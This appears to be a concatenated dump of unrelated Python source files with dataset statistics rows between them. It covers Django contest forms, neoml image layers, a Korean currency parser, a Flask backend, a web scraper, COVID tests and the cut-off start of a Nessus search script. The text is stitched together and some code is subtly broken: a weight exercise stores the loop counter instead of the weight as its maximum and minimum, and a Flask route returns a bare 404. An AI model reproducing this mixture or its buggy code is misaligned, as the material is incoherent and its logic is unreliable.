from contest.models import Clarification
from contest.contest_info import get_freeze_time_datetime
from users.models import User
from datetimewidget.widgets import DateTimeWidget, DateWidget, TimeWidget
from problem.models import Problem
from django.db.models import Q
class ContestForm(forms.ModelForm):
dateTimeOptions = {
'format': 'yyyy-mm-dd hh:ii:00',
'todayBtn': 'true',
'minuteStep': 1,
}
start_time = forms.DateTimeField(
widget=DateTimeWidget(options=dateTimeOptions, bootstrap_version=3))
end_time = forms.DateTimeField(
widget=DateTimeWidget(options=dateTimeOptions, bootstrap_version=3))
def __init__(self, *args, **kwargs):
super(ContestForm, self).__init__(*args, **kwargs)
# access object through self.instance...
initial = kwargs.get('initial', {})
user = initial.get('user', User())
owner = initial.get('owner', User())
method = initial.get('method', '')
self.fields['coowner'].queryset = User.objects.exclude(
Q(user_level=User.USER) | Q(pk=owner))
if method == 'GET':
contest_id = initial.get('id', 0)
# if user not is admin
# get all problem when user is admin
if not user.has_admin_auth():
# edit contest
if contest_id:
contest = Contest.objects.get(pk=contest_id)
contest_problems = contest.problem.all().distinct()
self.fields['problem'].queryset = Problem.objects.filter(
Q(visible=True) | Q(owner=user)).distinct() | contest_problems
# create contest
else:
self.fields['problem'].queryset = Problem.objects.filter(
Q(visible=True) | Q(owner=user))
elif method == 'POST':
self.fields['problem'].queryset = Problem.objects.all()
class Meta:
model = Contest
fields = (
'cname',
'owner',
'coowner',
'start_time',
'end_time',
'freeze_time',
'problem',
'is_homework',
'open_register',
)
def clean_freeze_time(self):
start_time = self.cleaned_data.get("start_time")
freeze_time = self.cleaned_data.get("freeze_time")
end_time = self.cleaned_data.get("end_time")
if type(end_time) is datetime.datetime:
if end_time - datetime.timedelta(minutes=freeze_time) <= start_time:
raise forms.ValidationError(
"Freeze time cannot longer than Contest duration.")
return freeze_time
def clean_end_time(self):
start_time = self.cleaned_data.get("start_time")
end_time = self.cleaned_data.get("end_time")
if end_time <= start_time:
raise forms.ValidationError(
"End time cannot be earlier than start time.")
return end_time
class ClarificationForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(ClarificationForm, self).__init__(*args, **kwargs)
# only problems contest contains will be shown in list
initial = kwargs.get('initial', {})
contest = initial.get('contest', {})
if type(contest) is Contest:
contest_id = contest.id
the_contest = Contest.objects.get(id=contest_id)
self.fields['problem'] = forms.ChoiceField(choices=[(problem.id, problem.pname)
for problem in the_contest.problem.all()])
class Meta:
model = Clarification
fields = (
'contest',
'problem',
'content',
'asker',
)
widgets = {
'content': forms.Textarea(),
}
class ReplyForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(ReplyForm, self).__init__(*args, **kwargs)
# only problems contest contains will be shown in list
initial = kwargs.get('initial', {})
contest = initial.get('contest', {})
if type(contest) is Contest:
clarifications = Clarification.objects.filter(contest=contest)
self.fields['clarification'] = forms.ChoiceField(
choices=[(clarification.id, clarification.content)
for clarification in clarifications.all()])
class Meta:
model = Clarification
fields = (
'reply',
'replier',
'reply_time',
'reply_all'
)
widgets = {
'reply': forms.Textarea(),
}
| 38.793548
| 106
| 0.611342
| 671
| 6,013
| 5.362146
| 0.320417
| 0.023346
| 0.020845
| 0.026404
| 0.287104
| 0.280989
| 0.22179
| 0.22179
| 0.199555
| 0.199555
| 0
| 0.002356
| 0.29403
| 6,013
| 154
| 107
| 39.045455
| 0.84523
| 0.216697
| 0
| 0.285714
| 0
| 0
| 0.094723
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044643
| false
| 0
| 0.089286
| 0
| 0.232143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee27cbb1f5ab8ff62e70e97b161ec8429dba0d48
| 8,087
|
py
|
Python
|
NeoML/Python/neoml/Dnn/ImageConversion.py
|
ndrewl/neoml
|
c87361fa8489c28a672cb8e1a447f47ba4c1dbc5
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
NeoML/Python/neoml/Dnn/ImageConversion.py
|
ndrewl/neoml
|
c87361fa8489c28a672cb8e1a447f47ba4c1dbc5
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
NeoML/Python/neoml/Dnn/ImageConversion.py
|
ndrewl/neoml
|
c87361fa8489c28a672cb8e1a447f47ba4c1dbc5
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
""" Copyright (c) 2017-2020 ABBYY Production LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
--------------------------------------------------------------------------------------------------------------*/
"""
import neoml.PythonWrapper as PythonWrapper
from .Dnn import Layer
from neoml.Utils import check_input_layers
class ImageResize(Layer):
"""The layer that resizes a set of two-dimensional multi-channel images.
Layer inputs
----------
#1: a set of images, of the dimensions:
- BatchLength * BatchWidth * ListSize - the number of images
- Height - the images' height
- Width - the images' width
- Depth * Channels - the number of channels the image format uses
Layer outputs
----------
#1: a blob with the resized images, of the dimensions:
- BatchLength, BatchWidth, ListSize, Depth, Channels are
equal to the input dimensions
- Height is the input Height plus the sum of top and bottom deltas
- Width is the input Width plus the sum of right and left deltas
Parameters
----------
input_layer : (object, int)
The input layer and the number of its output. If no number
is specified, the first output will be connected.
deltas : ("left", "right", "top", "bottom")
The differences between the original and the resized image,
on each side. If the difference is negative, rows or columns are
removed from the specified side. If it is positive, rows or
columns are added and filled with the default_value pixels.
default_value : float, default=0.0
The value for the added pixels.
name : str, default=None
The layer name.
"""
def __init__(self, input_layer, deltas, default_value=0.0, name=None):
if type(input_layer) is PythonWrapper.ImageResize:
super().__init__(input_layer)
return
layers, outputs = check_input_layers(input_layer, 1)
if len(deltas) != 4:
raise ValueError('The `deltas` must contain 4 elements.')
internal = PythonWrapper.ImageResize(str(name), layers[0], int(outputs[0]), int(deltas[0]), int(deltas[1]), int(deltas[2]), int(deltas[3]), default_value)
super().__init__(internal)
@property
def deltas(self):
"""Gets the size differences on each side.
"""
return self._internal.get_deltas()
@deltas.setter
def deltas(self, deltas):
"""Sets the size differences on each side.
"""
if len(deltas) != 4:
raise ValueError('The `deltas` must contain 4 elements.')
self._internal.set_deltas(deltas)
@property
def default_value(self):
"""Gets the default value for new pixels.
"""
return self._internal.get_default_value()
@default_value.setter
def default_value(self, default_value):
"""Sets the default value for new pixels.
"""
self._internal.set_default_value(default_value)
# ----------------------------------------------------------------------------------------------------------------------
class PixelToImage(Layer):
"""The layer that creates a set of two-dimensional images using a set of
pixel sequences with specified coordinates.
Layer inputs
----------
#1: a blob with pixel sequences.
The dimensions:
- BatchLength is 1
- BatchWidth is the number of sequences in the set
- ListSize is the length of each sequence
- Height, Width, Depth are 1
- Channels is the number of channels for the pixel sequences
and the output images.
#2: a blob with integer data that contains lists of pixel coordinates.
The dimensions:
- BatchWidth, ListSize are the same as for the first input
- the other dimensions are 1
Layer outputs
----------
#1: a blob with images.
The dimensions:
- BatchLength is 1
- BatchWidth is the same as for the first input
- ListSize is 1
- Height is the specified image height
- Width is the specified image width
- Depth is 1
- Channels is the same as for the first input
Parameters
----------
input_layer : (object, int)
The input layer and the number of its output. If no number
is specified, the first output will be connected.
height : int
The height of the resulting images.
width : int
The width of the resulting images.
name : str, default=None
The layer name.
"""
def __init__(self, input_layer, height, width, name=None):
if type(input_layer) is PythonWrapper.PixelToImage:
super().__init__(input_layer)
return
if height < 1:
raise ValueError('The `height` must be > 0.')
if width < 1:
raise ValueError('The `width` must be > 0.')
layers, outputs = check_input_layers(input_layer, 2)
internal = PythonWrapper.PixelToImage(str(name), layers[0], int(outputs[0]), layers[1], int(outputs[1]), int(height), int(width))
super().__init__(internal)
@property
def height(self):
"""Gets the output image height.
"""
return self._internal.get_height()
@height.setter
def height(self, height):
"""Sets the output image height.
"""
if height < 1:
raise ValueError('The `height` must be > 0.')
self._internal.set_height(height)
@property
def width(self):
"""Gets the output image width.
"""
return self._internal.get_width()
@width.setter
def width(self, width):
"""Sets the output image width.
"""
if width < 1:
raise ValueError('The `width` must be > 0.')
self._internal.set_width(width)
# ----------------------------------------------------------------------------------------------------------------------
class ImageToPixel(Layer):
"""The layer that extracts a set of pixel sequences along the specified
coordinates from a set of two-dimensional images.
Layer inputs
----------
#1: a set of two-dimensional images.
The blob dimensions:
- BatchLength is 1
- BatchWidth is the number of sequences in the set
- ListSize 1
- Height is the images' height
- Width is the images' width
- Depth is 1
- Channels is the number of channels the image format uses
#2: a blob with integer data that contains the pixel sequences.
The dimensions:
- BatchWidth is the same as for the first input
- ListSize is the length of each sequence
- all other dimensions are 1
Layer outputs
----------
#1: a blob with the pixel sequences.
The dimensions:
- BatchLength is 1
- BatchWidth is the inputs' BatchWidth
- ListSize is the same as for the second input
- Height, Width, Depth are 1
- Channels is the same as for the first input
Parameters
----------
input_layer : (object, int)
The input layer and the number of its output. If no number
is specified, the first output will be connected.
name : str, default=None
The layer name.
"""
def __init__(self, input_layer, name=None):
if type(input_layer) is PythonWrapper.ImageToPixel:
super().__init__(input_layer)
return
layers, outputs = check_input_layers(input_layer, 2)
internal = PythonWrapper.ImageToPixel(str(name), layers[0], layers[1], int(outputs[0]), int(outputs[1]))
super().__init__(internal)
| 33.143443
| 162
| 0.614319
| 1,028
| 8,087
| 4.749027
| 0.181907
| 0.018435
| 0.020279
| 0.014748
| 0.532773
| 0.481565
| 0.435887
| 0.364195
| 0.295371
| 0.295371
| 0
| 0.010853
| 0.259429
| 8,087
| 243
| 163
| 33.279835
| 0.804308
| 0.589836
| 0
| 0.428571
| 0
| 0
| 0.061385
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.174603
| false
| 0
| 0.047619
| 0
| 0.380952
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee2a0ae02c4f7fec036fd44cc9fb937a9290c455
| 237
|
py
|
Python
|
test.py
|
Torxed/python-pyson
|
9bcbc256ec989832a0729fef06b797c9eceeaefa
|
[
"MIT"
] | 3
|
2020-11-03T03:40:53.000Z
|
2021-01-30T08:37:16.000Z
|
test.py
|
Torxed/python-pyson
|
9bcbc256ec989832a0729fef06b797c9eceeaefa
|
[
"MIT"
] | null | null | null |
test.py
|
Torxed/python-pyson
|
9bcbc256ec989832a0729fef06b797c9eceeaefa
|
[
"MIT"
] | null | null | null |
import time
import random
import pyson
content = """
{
"time" : time.time(),
random.randint(0, 1) : "a random number",
"another_level" : {
"test" : 5
},
"main level" : True
}
"""
print(pyson.loads(content, globals(), locals()))
| 13.941176
| 48
| 0.616034
| 30
| 237
| 4.833333
| 0.666667
| 0.110345
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015544
| 0.185654
| 237
| 17
| 48
| 13.941176
| 0.735751
| 0
| 0
| 0
| 0
| 0
| 0.546218
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.214286
| 0
| 0.214286
| 0.071429
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee2b80f6a26a0a00b8f295285fad069f948e9400
| 808
|
py
|
Python
|
output_generator/Output.py
|
selcukusta/codalyze-rest-api
|
2aebb7d96ea0d601af3f8dd0a995bc730621407a
|
[
"MIT"
] | 2
|
2020-11-16T15:53:08.000Z
|
2021-06-24T07:16:15.000Z
|
output_generator/Output.py
|
selcukusta/codalyze-rest-api
|
2aebb7d96ea0d601af3f8dd0a995bc730621407a
|
[
"MIT"
] | null | null | null |
output_generator/Output.py
|
selcukusta/codalyze-rest-api
|
2aebb7d96ea0d601af3f8dd0a995bc730621407a
|
[
"MIT"
] | 1
|
2021-11-25T11:57:57.000Z
|
2021-11-25T11:57:57.000Z
|
# -*- coding: utf-8 -*-
"""
This module extends the default output formatting to include HTML.
"""
import sys
import datetime
from jinja2 import Template
def html_output(source, header, thresholds):
source_file_dict = {"filename": source.filename}
func_list = []
for source_function in source.function_list:
if source_function:
source_function_dict = source_function.__dict__
func_list.append(source_function_dict)
source_file_dict["functions"] = func_list
with open("./assets/report.html") as f:
output = Template(f.read()).render(
header=header,
date=datetime.datetime.now().strftime("%Y-%m-%d %H:%M"),
thresholds=thresholds,
argument=source_file_dict,
)
return output
| 27.862069
| 68
| 0.643564
| 95
| 808
| 5.242105
| 0.536842
| 0.168675
| 0.084337
| 0.096386
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003295
| 0.248762
| 808
| 28
| 69
| 28.857143
| 0.817133
| 0.110149
| 0
| 0
| 0
| 0
| 0.07173
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0.157895
| 0
| 0.263158
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee2cb32d9eb1f15b26b978d44b78859a10f8c8d9
| 5,733
|
py
|
Python
|
currnlp - deprecated.py
|
Elbitty/Elbitty
|
fafc1623ca002a6e499101b513696fecf1e894d1
|
[
"MIT"
] | null | null | null |
currnlp - deprecated.py
|
Elbitty/Elbitty
|
fafc1623ca002a6e499101b513696fecf1e894d1
|
[
"MIT"
] | 3
|
2017-07-03T04:01:29.000Z
|
2017-07-04T00:22:54.000Z
|
currnlp - deprecated.py
|
Elbitty/Elbitty
|
fafc1623ca002a6e499101b513696fecf1e894d1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import NLP
def calculate(tags):
tmp_str = " ".join(str(val) for val in tags)
tmp_tags = NLP.calculate_also_pos(tmp_str)
print(tmp_tags)
lst_query = ["USD", "KRW"]#기본 원달러 환율로 초기화
str_humanize = ["달러", "원"]#기본 원달러 환율로 초기화
indicator = 0
cursor = 0
value_of_currency = 1
multiplier = 1
for idx, val in enumerate(tmp_tags):
if val[1] == "Number":
if (idx - cursor) < 2:
value_of_currency = float(val[0])
if (idx - cursor) < 3:
if val[0] == "십":
multiplier = 10
cursor = idx
if val[0] == "백":
multiplier = 100
cursor = idx
if val[0] == "천":
multiplier = 1000
cursor = idx
if val[0] == "만":
multiplier = 10000
cursor = idx
if val[0] == "십만":
multiplier = 100000
cursor = idx
if val[0] == "백만":
multiplier = 1000000
cursor = idx
if val[0] == "천만":
multiplier = 10000000
cursor = idx
if val[0] == "억":
multiplier = 100000000
cursor = idx
if val[0] == "십억":
multiplier = 1000000000
cursor = idx
if (val[0] == "원") or (val[0] == "원화") or (val[0] == "KRW"):
str_humanize[indicator] = "원"
lst_query[indicator] = "KRW"
cursor = idx
indicator += 1
elif val[0] == "십원":
str_humanize[indicator] = "원"
lst_query[indicator] = "KRW"
cursor = idx
multiplier = 10
indicator += 1
elif val[0] == "백원":
str_humanize[indicator] = "원"
lst_query[indicator] = "KRW"
cursor = idx
multiplier = 100
indicator += 1
elif val[0] == "천원":
str_humanize[indicator] = "원"
lst_query[indicator] = "KRW"
cursor = idx
multiplier = 1000
indicator += 1
elif val[0] == "만원":
str_humanize[indicator] = "원"
lst_query[indicator] = "KRW"
cursor = idx
multiplier = 10000
indicator += 1
elif val[0] == "십만원":
str_humanize[indicator] = "원"
lst_query[indicator] = "KRW"
cursor = idx
multiplier = 100000
indicator += 1
elif val[0] == "백만원":
str_humanize[indicator] = "원"
lst_query[indicator] = "KRW"
cursor = idx
multiplier = 1000000
indicator += 1
elif val[0] == "천만원":
str_humanize[indicator] = "원"
lst_query[indicator] = "KRW"
cursor = idx
multiplier = 10000000
indicator += 1
elif val[0] == "억원":
str_humanize[indicator] = "원"
lst_query[indicator] = "KRW"
cursor = idx
multiplier = 100000000
indicator += 1
elif (val[0] == "달러") or (val[0] == "달러화"):
str_humanize[indicator] = "달러"
lst_query[indicator] = "USD"
cursor = idx
indicator += 1
elif (val[0] == "엔") or (val[0] == "엔화") or (val[0] == "JPY"):
str_humanize[indicator] = "엔"
lst_query[indicator] = "JPY"
cursor = idx
indicator += 1
elif val[0] == "십엔":
str_humanize[indicator] = "엔"
lst_query[indicator] = "JPY"
cursor = idx
multiplier = 10
indicator += 1
elif val[0] == "백엔":
str_humanize[indicator] = "엔"
lst_query[indicator] = "JPY"
cursor = idx
multiplier = 100
indicator += 1
elif val[0] == "천엔":
str_humanize[indicator] = "엔"
lst_query[indicator] = "JPY"
cursor = idx
multiplier = 1000
indicator += 1
elif val[0] == "만엔":
str_humanize[indicator] = "엔"
lst_query[indicator] = "JPY"
cursor = idx
multiplier = 10000
indicator += 1
elif val[0] == "십만엔":
str_humanize[indicator] = "엔"
lst_query[indicator] = "JPY"
cursor = idx
multiplier = 100000
indicator += 1
elif val[0] == "백만엔":
str_humanize[indicator] = "엔"
lst_query[indicator] = "JPY"
cursor = idx
multiplier = 1000000
indicator += 1
elif val[0] == "천만엔":
str_humanize[indicator] = "엔"
lst_query[indicator] = "JPY"
cursor = idx
multiplier = 10000000
indicator += 1
elif (val[0] == "유로") or (val[0] == "유로화") or (val[0] == "EUR"):
str_humanize[indicator] = "유로"
lst_query[indicator] = "EUR"
cursor = idx
indicator += 1
elif (val[0] == "위안") or (val[0] == "위안화") or (val[0] == "CNY"):
str_humanize[indicator] = "위안"
lst_query[indicator] = "CNY"
cursor = idx
indicator += 1
to_measure = int(value_of_currency * multiplier)
if (to_measure == 1) and (not indicator <= 1):
str_humanize.reverse()
str_query = lst_query[1] + lst_query[0]
else:
str_query = lst_query[0] + lst_query[1]
return str_query, to_measure, str_humanize
if __name__ == "__main__":
print(calculate(['50', '만엔', '얼마']))
| 30.822581
| 72
| 0.451073
| 591
| 5,733
| 4.248731
| 0.177665
| 0.062127
| 0.159299
| 0.128634
| 0.623258
| 0.562326
| 0.562326
| 0.526483
| 0.526483
| 0.398248
| 0
| 0.063164
| 0.425606
| 5,733
| 185
| 73
| 30.989189
| 0.699362
| 0.012036
| 0
| 0.634731
| 0
| 0
| 0.034452
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005988
| false
| 0
| 0.005988
| 0
| 0.017964
| 0.011976
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee2dc666a79347b77adfd1d774a2855491600019
| 1,617
|
py
|
Python
|
__main__.py
|
tinyurl-com-ItsBigBrainTimeXD/backend
|
4d360ed02aa5475279af03e4f4300dde6ccc3391
|
[
"MIT"
] | null | null | null |
__main__.py
|
tinyurl-com-ItsBigBrainTimeXD/backend
|
4d360ed02aa5475279af03e4f4300dde6ccc3391
|
[
"MIT"
] | null | null | null |
__main__.py
|
tinyurl-com-ItsBigBrainTimeXD/backend
|
4d360ed02aa5475279af03e4f4300dde6ccc3391
|
[
"MIT"
] | null | null | null |
from multiprocessing import Lock
from flask import Flask, request, jsonify
from constants import HOST, PORT
from Database.database import Database
from handler.frontendHandler import frontend_handler
from handler.iotHandler import iot_handler
# Create the flask application
app = Flask(__name__)
db_name = 'test.db'
db_lock = Lock()
# Create a basic route for debugging
@app.route('/')
def index():
"""The homepage for the api
This is for debugging purposes
"""
return '<h1>Hello world</h1>'
# REST for frontend
@app.route('/frontend/<query>', methods=['GET'])
def front_end_get(query):
"""Get data"""
# Get the body and the request type
if not query.isdigit():
return 404
req_body = {'type': int(query)}
req_type = request.method
req_body.update(request.args)
db_lock.acquire(True)
db = Database(db_name)
result = frontend_handler(req_body, req_type, db)
del db
db_lock.release()
return jsonify(result)
@app.route('/frontend', methods=['POST', 'PUT', 'DELETE'])
def frontend():
"""The endpoint for the frontend application to interact with"""
# Get the body and the request type
req_body = request.get_json()
req_type = request.method
db_lock.acquire(True)
db = Database(db_name)
result = frontend_handler(req_body, req_type, db)
del db
db_lock.release()
return jsonify(result)
@app.route('/device', methods = ['GET'])
def iot_get():
req_type = request.method.lower()
result = iot_handler(req_type)
return jsonify(result)
if __name__ == "__main__":
app.run(HOST, PORT)
| 25.265625
| 68
| 0.685838
| 224
| 1,617
| 4.772321
| 0.334821
| 0.039289
| 0.022451
| 0.056127
| 0.265669
| 0.265669
| 0.265669
| 0.215154
| 0.215154
| 0.215154
| 0
| 0.003855
| 0.197897
| 1,617
| 63
| 69
| 25.666667
| 0.820355
| 0.16945
| 0
| 0.357143
| 0
| 0
| 0.070229
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095238
| false
| 0
| 0.142857
| 0
| 0.357143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee2fea5e9be5798ddc9725b7766369f326b358d6
| 452
|
py
|
Python
|
ex055.py
|
LucasLCarreira/Python
|
03bd64837d74315687e567261a149f0176496348
|
[
"MIT"
] | 1
|
2020-04-21T19:14:50.000Z
|
2020-04-21T19:14:50.000Z
|
ex055.py
|
LucasLCarreira/Python
|
03bd64837d74315687e567261a149f0176496348
|
[
"MIT"
] | null | null | null |
ex055.py
|
LucasLCarreira/Python
|
03bd64837d74315687e567261a149f0176496348
|
[
"MIT"
] | null | null | null |
# Exercício Python 055
# Leia o peso de 5 pessoas, mostre o maior e o menor
maior = 0
menor = 0
for p in range(1, 6):
peso = int(input("Digite o peso:"))
if p == 1: #com o contador na primeira posição, o maior e o menor são iguais
maior = peso
menor = peso
else:
if peso > maior:
maior = p
if peso < menor:
menor = p
print("O maior valor é:", maior)
print("O menor valor é:", menor)
| 25.111111
| 80
| 0.573009
| 74
| 452
| 3.5
| 0.472973
| 0.069498
| 0.054054
| 0.061776
| 0.100386
| 0
| 0
| 0
| 0
| 0
| 0
| 0.029801
| 0.331858
| 452
| 17
| 81
| 26.588235
| 0.827815
| 0.298673
| 0
| 0
| 0
| 0
| 0.146965
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.142857
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee30562de746fae8c4e7f911bc276f4521628762
| 886
|
py
|
Python
|
1 - companies_list_downloader.py
|
B-Jugurtha/Project-01--Web-scraping---Data-cleaning
|
981ec207c6c2d55efb10f137fec0bbf06df50cbb
|
[
"MIT"
] | null | null | null |
1 - companies_list_downloader.py
|
B-Jugurtha/Project-01--Web-scraping---Data-cleaning
|
981ec207c6c2d55efb10f137fec0bbf06df50cbb
|
[
"MIT"
] | null | null | null |
1 - companies_list_downloader.py
|
B-Jugurtha/Project-01--Web-scraping---Data-cleaning
|
981ec207c6c2d55efb10f137fec0bbf06df50cbb
|
[
"MIT"
] | null | null | null |
from bs4 import BeautifulSoup as bs
from pathlib import Path
import os
import glob
import time
import random
import requests
pwd = os.getcwd()
page_counter = 1
URL = "https://www.example.com/companies/?page="
# Creating 'pages' folder if this one exists deletes it's content
try:
Path(pwd + '/pages').mkdir(parents=True, exist_ok=False)
except FileExistsError:
print("File Already exists, Deleting it's content...")
files = glob.glob(pwd + '/pages/*')
for f in files:
os.remove(f)
time.sleep(5)
while page_counter <= 400:
page = requests.get(URL+str(page_counter))
soup = bs(page.content, "html.parser")
if(page_counter % 10 == 0):
time.sleep(random.randrange(8, 13))
print(page_counter)
with open('pages/'+str(page_counter)+".html", "w", encoding='utf-8') as file:
file.write(str(soup))
page_counter += 1
| 23.945946
| 81
| 0.667043
| 130
| 886
| 4.484615
| 0.561538
| 0.132075
| 0.041166
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019635
| 0.19526
| 886
| 36
| 82
| 24.611111
| 0.798036
| 0.071106
| 0
| 0
| 0
| 0
| 0.154689
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.259259
| 0
| 0.259259
| 0.074074
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee33559773aa94f6134aaa49252ad4b6b825ef37
| 791
|
py
|
Python
|
tests/test_apps/test_covid_preprocessing.py
|
jtrauer/AuTuMN
|
2e1defd0104bbecfe667b8ea5ecaf4bc6741905c
|
[
"BSD-2-Clause-FreeBSD"
] | 14
|
2020-03-11T06:15:30.000Z
|
2022-03-09T03:38:35.000Z
|
tests/test_apps/test_covid_preprocessing.py
|
jtrauer/AuTuMN
|
2e1defd0104bbecfe667b8ea5ecaf4bc6741905c
|
[
"BSD-2-Clause-FreeBSD"
] | 96
|
2020-01-29T05:10:29.000Z
|
2022-03-31T01:48:46.000Z
|
tests/test_apps/test_covid_preprocessing.py
|
monash-emu/AuTuMN
|
fa3b81ef54cf561e0e7364a48f4ff96585dc3310
|
[
"BSD-2-Clause-FreeBSD"
] | 10
|
2020-04-24T00:38:00.000Z
|
2021-08-19T16:19:03.000Z
|
import numpy as np
from autumn.models.covid_19.detection import create_cdr_function
def test_cdr_intercept():
"""
Test that there is zero case detection when zero tests are performed
"""
for cdr_at_1000_tests in np.linspace(0.05, 0.5, 10):
cdr_function = create_cdr_function(1000.0, cdr_at_1000_tests)
assert cdr_function(0.0) == 0.0
def test_cdr_values():
"""
Test that CDR is always a proportion, bounded by zero and one
"""
for cdr_at_1000_tests in np.linspace(0.05, 0.5, 10):
cdr_function = create_cdr_function(1000.0, cdr_at_1000_tests)
for i_tests in list(np.linspace(0.0, 1e3, 11)) + list(np.linspace(0.0, 1e5, 11)):
assert cdr_function(i_tests) >= 0.0
assert cdr_function(i_tests) <= 1.0
| 30.423077
| 89
| 0.672566
| 133
| 791
| 3.766917
| 0.368421
| 0.175649
| 0.071856
| 0.111776
| 0.487026
| 0.331337
| 0.331337
| 0.331337
| 0.331337
| 0.331337
| 0
| 0.100977
| 0.223767
| 791
| 25
| 90
| 31.64
| 0.714984
| 0.164349
| 0
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.166667
| false
| 0
| 0.166667
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee350ea74f60bf255d219e07c176125875586383
| 5,339
|
py
|
Python
|
nessussearch.py
|
canidorichard/nessussearch
|
7b4623f0b3a3fb60706eb39785ea4f7a1cebf800
|
[
"BSD-2-Clause-FreeBSD"
] | 1
|
2020-06-30T15:53:03.000Z
|
2020-06-30T15:53:03.000Z
|
nessussearch.py
|
canidorichard/nessussearch
|
7b4623f0b3a3fb60706eb39785ea4f7a1cebf800
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
nessussearch.py
|
canidorichard/nessussearch
|
7b4623f0b3a3fb60706eb39785ea4f7a1cebf800
|
[
"BSD-2-Clause-FreeBSD"
] | 2
|
2020-08-05T23:25:36.000Z
|
2020-09-26T10:01:18.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2019, Richard Hughes All rights reserved.
# Released under the BSD license. Please see LICENSE.md for more information.
import sys
import os
import argparse
import glob
import xml.dom.minidom
import re
# Define command line arguments
parms=argparse.ArgumentParser()
parms.add_argument("-f", "--file", type=str, required=False, default="*.nessus", help="Specify input file(s)")
parms.add_argument("-c", "--case_sensitive", required=False, action="store_true", help="Case sensitive search")
parms.add_argument("-d", "--debug", required=False, action="store_true", help="Debug output")
parms.add_argument("-o", "--output", type=str, required=False, default="xml_min", choices=['xml','xml_min','ipv4',"mac","mac+ipv4","ports","script"], help="Specify output format")
parms.add_argument("-p", "--path", type=str, required=False, default=".", help="Specify location of file(s)")
parms.add_argument("-r", "--regex", type=str, required=True, help="Search expression")
args = vars(parms.parse_args())
# Globals
errorsexist = False
# Main processing
def main(args):
# If output format is XML then add root element
if args['output'] == "xml":
